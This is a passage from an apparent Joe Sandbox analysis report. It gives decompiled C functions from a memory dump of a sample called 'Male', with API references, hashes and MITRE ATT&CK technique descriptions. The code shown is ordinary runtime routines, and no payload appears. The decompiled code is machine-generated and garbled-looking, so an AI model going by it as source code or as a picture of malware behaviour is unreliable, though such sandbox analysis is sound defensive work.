				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E013D4DC5(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E013F21C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E013F21C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0x13d819f
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E013D2760(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E013F21C0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E013F21E0();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E013F21E0();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E013F21E0();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E013E45A3(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E013F2550(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E013E2C38();
					_t183 = 0x22;
					 *_t129 = _t183;
					E013E2B7C();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}

0x013e42a0
0x013e42ab
0x013e42b2
0x013e42b4
0x013e42b4
0x013e42b6
0x013e42bf
0x013e42c1
0x013e42c6
0x013e42cc
0x013e42e2
0x013e42e7
0x013e42ea
0x013e42f7
0x013e42fc
0x013e4350
0x013e4358
0x013e435a
0x013e435c
0x013e435f
0x013e435f
0x013e435f
0x013e4365
0x013e436d
0x013e4380
0x013e4383
0x013e4385
0x013e4388
0x013e4389
0x013e43aa
0x013e43ad
0x013e43ad
0x013e438b
0x013e438b
0x013e438d
0x013e4398
0x013e4398
0x013e439a
0x013e43a1
0x013e439c
0x013e439c
0x013e439c
0x013e439a
0x013e43ae
0x013e43b0
0x013e43b1
0x013e43b4
0x013e43b6
0x013e43ca
0x013e43b8
0x013e43b8
0x013e43b8
0x013e43cf
0x013e43cf
0x013e43d4
0x013e43d7
0x013e43e2
0x013e43e2
0x013e43e2
0x013e43e2
0x013e43e6
0x013e43ed
0x013e43ee
0x013e43f1
0x013e43f4
0x013e43f4
0x013e43f6
0x00000000
0x00000000
0x013e440e
0x013e4415
0x013e4419
0x013e441c
0x013e441f
0x013e4421
0x013e4421
0x013e4421
0x013e4423
0x013e4426
0x013e4429
0x013e442b
0x013e4433
0x013e4439
0x013e443c
0x013e443f
0x013e4440
0x013e4443
0x013e4446
0x013e4446
0x013e444b
0x013e444e
0x00000000
0x00000000
0x013e4466
0x013e446b
0x013e446f
0x00000000
0x00000000
0x013e4473
0x013e4473
0x013e4476
0x013e4477
0x013e4477
0x013e4479
0x013e447c
0x00000000
0x00000000
0x013e447e
0x013e4481
0x013e4488
0x013e448b
0x013e448e
0x013e44a4
0x013e44a4
0x013e44a4
0x013e4490
0x013e4490
0x013e4492
0x013e4495
0x013e44a0
0x013e4497
0x013e449a
0x013e449a
0x013e4495
0x00000000
0x013e448e
0x013e4483
0x013e4483
0x013e4485
0x013e4485
0x013e43d9
0x013e43d9
0x013e43dc
0x013e44a7
0x013e44a7
0x013e44a9
0x013e44ab
0x013e44ae
0x013e44af
0x013e44b0
0x013e44b1
0x013e44b9
0x013e44b9
0x013e44b9
0x013e44bb
0x013e44be
0x013e44c1
0x013e44c3
0x013e44c3
0x013e44c5
0x013e44d7
0x013e44db
0x013e44de
0x013e44e5
0x013e44ed
0x013e44ed
0x013e44f0
0x013e44f2
0x013e4503
0x013e4503
0x013e4507
0x013e4507
0x013e450a
0x013e450c
0x013e450f
0x00000000
0x013e44f4
0x013e44f4
0x013e44fa
0x013e44fa
0x013e44fe
0x013e4511
0x013e4511
0x013e4515
0x013e4516
0x013e4518
0x013e451a
0x013e455b
0x013e455b
0x013e455d
0x013e456a
0x013e456a
0x013e456c
0x013e456e
0x013e456f
0x013e4570
0x013e4577
0x013e457a
0x013e457c
0x013e457c
0x013e457d
0x013e457f
0x013e4582
0x013e4582
0x013e4584
0x013e4586
0x00000000
0x013e4586
0x013e455f
0x013e4561
0x00000000
0x00000000
0x013e4563
0x00000000
0x00000000
0x013e4565
0x013e4568
0x00000000
0x00000000
0x00000000
0x013e4568
0x013e4521
0x013e4527
0x013e4527
0x013e4529
0x013e452a
0x013e452b
0x013e452c
0x013e4533
0x013e4536
0x013e4538
0x013e4539
0x013e453b
0x013e4548
0x013e4548
0x013e454a
0x013e454c
0x013e454d
0x013e454e
0x013e4555
0x013e4558
0x013e455a
0x013e455a
0x00000000
0x013e455a
0x013e453d
0x013e453d
0x013e453f
0x00000000
0x00000000
0x013e4541
0x00000000
0x00000000
0x013e4543
0x013e4546
0x00000000
0x00000000
0x00000000
0x013e4546
0x013e4523
0x013e4525
0x00000000
0x00000000
0x00000000
0x013e4525
0x013e44f6
0x013e44f8
0x00000000
0x00000000
0x00000000
0x013e44f8
0x013e44f2
0x00000000
0x013e43dc
0x013e43d7
0x013e42fe
0x013e4300
0x00000000
0x013e4302
0x013e4318
0x013e431d
0x013e431f
0x013e432b
0x013e4331
0x013e4332
0x013e4334
0x013e4336
0x013e4341
0x013e4341
0x013e4344
0x013e4346
0x013e4346
0x013e4349
0x013e4321
0x013e4321
0x013e4321
0x00000000
0x013e431f
0x013e42ce
0x013e42ce
0x013e42d5
0x013e42d6
0x013e42d8
0x013e458a
0x013e458e
0x013e4593
0x013e4593
0x013e45a2
0x013e45a2

APIs

_strrchr.LIBCMT ref: 013E432B
__alldvrm.LIBCMT ref: 013E452C
__alldvrm.LIBCMT ref: 013E454E

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: b7f10559f626c80453af757d5ec9f0138941ef8a887e3562974eb8c521b6b901
Instruction ID: 07c24cd288c232a4233765ef9443ed65b49d583924a711873a85c2e0206908e7
Opcode Fuzzy Hash: b7f10559f626c80453af757d5ec9f0138941ef8a887e3562974eb8c521b6b901
Instruction Fuzzy Hash: 4FA15832A007A6DFEB22CF1CC8857AEBFE4EF59218F18416DD545DB6C1D2389941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 013EDCE3, Relevance: 6.1, APIs: 4, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E013EDCE3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0x147d014; // 0xf9c9c506
				_v8 = _t34 ^ _t70;
				E013D4DC5(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0x8be85006
					_t53 =  *_t6;
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E013D0EAC(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E013D2760(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E013E18C7(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E013E3C40(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E013F2460();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}

0x013edceb
0x013edcf2
0x013edcfe
0x013edd03
0x013edd08
0x013edd0d
0x013edd0d
0x013edd10
0x013edd12
0x013edd12
0x013edd17
0x013edd30
0x013edd36
0x013edd3b
0x013eddda
0x013eddde
0x013edde3
0x013edde3
0x013eddff
0x013eddff
0x013edd41
0x013edd49
0x013edd4d
0x013edd99
0x013edd9b
0x013edd9d
0x013edda2
0x013eddb9
0x013eddc1
0x013eddd1
0x013eddd1
0x013eddc1
0x013eddd3
0x013eddd4
0x00000000
0x013eddd9
0x013edd54
0x013edd56
0x013edd58
0x013edd60
0x013edd7d
0x013edd87
0x013edd8c
0x00000000
0x00000000
0x013edd8e
0x013edd94
0x013edd94
0x00000000
0x013edd94
0x013edd64
0x013edd68
0x013edd6d
0x013edd71
0x00000000
0x00000000
0x013edd73
0x00000000

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,013D7191,00000000,00000000,013D86F9,?,013D86F9,?,00000001,013D7191,8BE85006,00000001,013D86F9,013D86F9), ref: 013EDD30
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 013EDDB9
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 013EDDCB
__freea.LIBCMT ref: 013EDDD4

Part of subcall function 013E3C40: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,013D0215,00000000,?,013B8E5F,00000004,?,013F4C6B,?,?,013B10E8,0144DBF4), ref: 013E3C72

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: b85e80cd75bc245ef991c624dd27773c1ae9677856095a3af102173a3cee361c
Instruction ID: 7f78f57838372a8b931ba0eced6f2253f7d8ed3ea9ab17c644ad168cb81a2d93
Opcode Fuzzy Hash: b85e80cd75bc245ef991c624dd27773c1ae9677856095a3af102173a3cee361c
Instruction Fuzzy Hash: 0131B072A0022AABDF258FA8DC48DAF7BE5EF50614F054268FC05D7294EB36C950CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013B6DB1, Relevance: 6.1, APIs: 4, Instructions: 53
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E013B6DB1(struct HWND__** _a4, long _a8, WCHAR* _a12, WCHAR* _a16, signed int _a20, int _a24, int _a28, int _a32, int _a36, struct HMENU__* _a40, intOrPtr _a48) {
				long _t16;
				long _t26;
				struct HWND__** _t28;
				struct HWND__* _t31;

				_t16 = _a8;
				_t26 = _a20 | 0x50000000;
				if((_t16 & 0x00080000) != 0) {
					_t16 = _t16 & 0xfff7ffff;
				}
				_t28 = _a4;
				_t31 = CreateWindowExW(_t16, _a12, _a16, _t26, _a24, _a28, _a32, _a36,  *_t28, _a40,  *0x1482924, 0);
				if(_t31 == 0) {
					L5:
					return _t31;
				} else {
					if(_a48 != 0) {
						SendMessageW(_t31, 0x30, GetStockObject(0x11), 0);
					}
					if(_t28[0x63] >= 0) {
						if(_t28[0x66] != 0) {
							ShowWindow(_t31, 0);
						}
					}
					goto L5;
				}
			}

0x013b6db7
0x013b6dba
0x013b6dc5
0x013b6e28
0x013b6e28
0x013b6dca
0x013b6df5
0x013b6df9
0x013b6e1f
0x013b6e25
0x013b6dfb
0x013b6dfe
0x013b6e0d
0x013b6e0d
0x013b6e19
0x013f5c64
0x013f5c6c
0x013f5c6c
0x013f5c64
0x00000000
0x013b6e19

APIs

CreateWindowExW.USER32 ref: 013B6DEF
GetStockObject.GDI32(00000011), ref: 013B6E03
SendMessageW.USER32(00000000,00000030,00000000), ref: 013B6E0D

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: d3e0764e5011048cca867ea8e2c1fff17c7ac209b60f81d28eac1b131f26b008
Instruction ID: 18bab111ddc5d52b765b0f167c50d65bec288c1430e8a9aafd737cfb5b022193
Opcode Fuzzy Hash: d3e0764e5011048cca867ea8e2c1fff17c7ac209b60f81d28eac1b131f26b008
Instruction Fuzzy Hash: 94118EB2601548BFEF128F94DD95EEABBA9EF08358F000105FB0856051D731DC60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 013E3493, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E013E3493(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x1481ef8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x1452cb0 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xf9c9c507
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x013e3498
0x013e349c
0x013e34a3
0x013e34a7
0x013e34b5
0x013e34cb
0x013e34cf
0x013e34f8
0x013e34fa
0x013e34fe
0x013e3501
0x013e3501
0x013e3507
0x013e3509
0x00000000
0x013e350a
0x013e34d1
0x013e34da
0x013e34e9
0x013e34dc
0x013e34df
0x013e34e5
0x013e34e5
0x013e34ed
0x00000000
0x013e34ef
0x013e34f2
0x013e34f4
0x00000000
0x013e34f4
0x013e34ed
0x013e34a9
0x013e34ae
0x00000000

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,013B10E8,00000000,00000000,?,013E343A,013B10E8,00000000,00000000,00000000,?,013E36AB,00000006,FlsSetValue), ref: 013E34C5
GetLastError.KERNEL32(?,013E343A,013B10E8,00000000,00000000,00000000,?,013E36AB,00000006,FlsSetValue,01453248,FlsSetValue,00000000,00000364,?,013E3266), ref: 013E34D1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,013E343A,013B10E8,00000000,00000000,00000000,?,013E36AB,00000006,FlsSetValue,01453248,FlsSetValue,00000000), ref: 013E34DF

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: edd7b55e3558548bde94a27b91c723b916dd89a64bd22a5b22adf77713dc4fe8
Instruction ID: 87eeab263978cd92930e4c9663a73f013d85da9aa7e9f1fefeaa7212ec560561
Opcode Fuzzy Hash: edd7b55e3558548bde94a27b91c723b916dd89a64bd22a5b22adf77713dc4fe8
Instruction Fuzzy Hash: 2501D43A611336EBCB324BADAC48AA67BD8BF04B647100620F916E72C5D721D4018BE0

Uniqueness

Uniqueness Score: -1.00%

Function 01448E6B, Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01448E6B(struct HDC__* _a4, int _a8, int _a12, int _a16, int _a20, signed char _a24) {
				void* __esi;
				void* _t9;
				void* _t15;
				struct HDC__* _t17;

				if((_a24 & 0x00000002) != 0) {
					_t17 = _a4;
					E013B1E82(_t15, _t17, _t17, 0, 0xffffffff, 2, 1);
					MoveToEx(_t17, _a8, _a12, 0);
					LineTo(_t17, _a16, _a20);
					if( *0x148298c != 0) {
						EndPath(_t17);
						 *0x148298c = 0;
					}
					return StrokePath(_t17);
				}
				return _t9;
			}

0x01448e72
0x01448e75
0x01448e81
0x01448e8f
0x01448e9c
0x01448ea9
0x01448eac
0x01448eb2
0x01448eb2
0x00000000
0x01448ec0
0x01448ec2

APIs

Part of subcall function 013B1E82: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 013B1EDC
Part of subcall function 013B1E82: SelectObject.GDI32(?,00000000), ref: 013B1EEB
Part of subcall function 013B1E82: BeginPath.GDI32(?), ref: 013B1F02
Part of subcall function 013B1E82: SelectObject.GDI32(?,00000000), ref: 013B1F2B

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 01448E8F
LineTo.GDI32(?,?,?), ref: 01448E9C
EndPath.GDI32(?), ref: 01448EAC
StrokePath.GDI32(?), ref: 01448EBA

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: cd4b281dd531bf841d6f54b082d87b7d95ba2e23e95353a0e363099487889a02
Instruction ID: d8355c80c3d7da94d76d3b6f0e0473ac93b44eaf08891e063982e6b7ce7d6fd6
Opcode Fuzzy Hash: cd4b281dd531bf841d6f54b082d87b7d95ba2e23e95353a0e363099487889a02
Instruction Fuzzy Hash: B5F0BE3540125ABBEB226F98AC09FCF3F19AF16354F048100FB01620E583B55111DFE5

Uniqueness

Uniqueness Score: -1.00%

Function 01435F0E, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(013C314C,?,?,?,?,?), ref: 01435FA1
_wcslen.LIBCMT ref: 01435FAD

Strings

CALLARGARRAY, xrefs: 01435FA7, 01435FAC

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 08976ce74df347b4f0d507fd5a7d0faf9e6f36f0ace141560a0007c9937040dd
Instruction ID: d046fbb9df1a668372a3eb2bf6a8e4e2ca925a00e08447fa72354c543d740136
Opcode Fuzzy Hash: 08976ce74df347b4f0d507fd5a7d0faf9e6f36f0ace141560a0007c9937040dd
Instruction Fuzzy Hash: AC418071E001069FCB14EFADC8958EEBBB5EF58325F11406EE505AB3A1E7319941CB90

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

